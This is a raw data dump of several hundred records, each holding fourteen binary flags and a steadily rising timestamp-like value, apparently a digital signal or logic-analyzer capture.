1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324612e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324636e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324660e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324684e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324712e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324736e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324764e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324788e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324812e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324836e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324912e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324936e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2324964e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2324988e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325012e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2325036e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325060e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2325084e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325112e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2325136e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325156e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2325184e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325208e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2325236e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2325260e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2449412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2449604e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2449628e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,3.2449656e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2449680e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2449968e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2449992e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2450016e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.2450044e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.2450068e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.2450092e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.2450116e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.2450140e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,3.2450164e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,3.2450192e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,1,3.2450196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2450200e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2450244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450248e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450268e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450292e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450316e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450324e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2450340e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450364e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2450392e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450416e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2450420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450424e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450468e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450492e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450516e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450540e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450564e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450572e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2450620e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450644e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2450648e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450668e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450692e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450696e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2450740e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2450764e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450788e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450812e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450840e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450868e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450892e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450916e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450940e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2450964e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2450988e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451012e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451092e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451116e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451140e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451164e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451172e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2451188e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451212e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2451244e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451268e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2451292e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451316e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2451320e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451368e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451388e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451412e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451516e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451544e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451644e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451668e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451692e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451716e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451744e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451768e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451844e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451848e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2451892e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2451920e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2451924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451928e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451944e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2451972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2451996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452068e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452076e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2452120e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452144e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452152e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452172e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.2452196e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452200e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2452244e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452268e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452276e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452292e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452316e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452344e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452428e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2452472e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452504e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452596e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.2452600e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452604e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2452620e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452896e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452900e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2452924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2452948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452956e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2452972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2452996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453072e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453096e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453272e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453296e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453324e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.2453348e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453352e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2453396e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453420e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2453444e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453472e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.2453476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453480e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453548e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453572e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453620e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453628e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2453672e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453704e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453748e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453896e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453900e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2453948e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2453972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2453980e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2453996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454072e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454096e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454148e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454220e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454272e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454276e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2454324e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454356e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454472e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454496e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454500e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2454548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454572e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2454596e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454628e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454672e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454772e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454776e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2454820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454852e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2454872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454896e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454900e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2454948e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2454972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2454980e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455120e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.2455124e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455128e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455148e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455180e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455220e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455272e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455296e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455428e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455444e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455472e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455496e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455524e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455580e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455644e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455672e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455696e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455700e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455748e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455772e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2455796e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455828e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455872e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455896e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2455948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2455972e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2455976e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2456020e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2456044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456052e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456072e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456096e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456272e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456296e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456472e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456496e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456644e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456672e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456696e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456748e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456788e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456812e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456836e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456860e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2456884e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2456908e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2581316e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2581544e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,3.2581572e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2581596e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2581884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2581912e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2581936e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2581964e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2581988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2582012e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2582036e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2582060e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.2582084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.2582108e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,3.2582116e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582152e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2582164e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582196e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582212e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582336e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582436e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582484e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582492e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2582540e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582564e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582572e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582584e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582612e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2582660e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2582684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582692e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582760e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582784e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2582960e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2582984e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583160e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.2583184e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.2583212e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.2583236e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2583240e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.2583284e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.2583308e-02 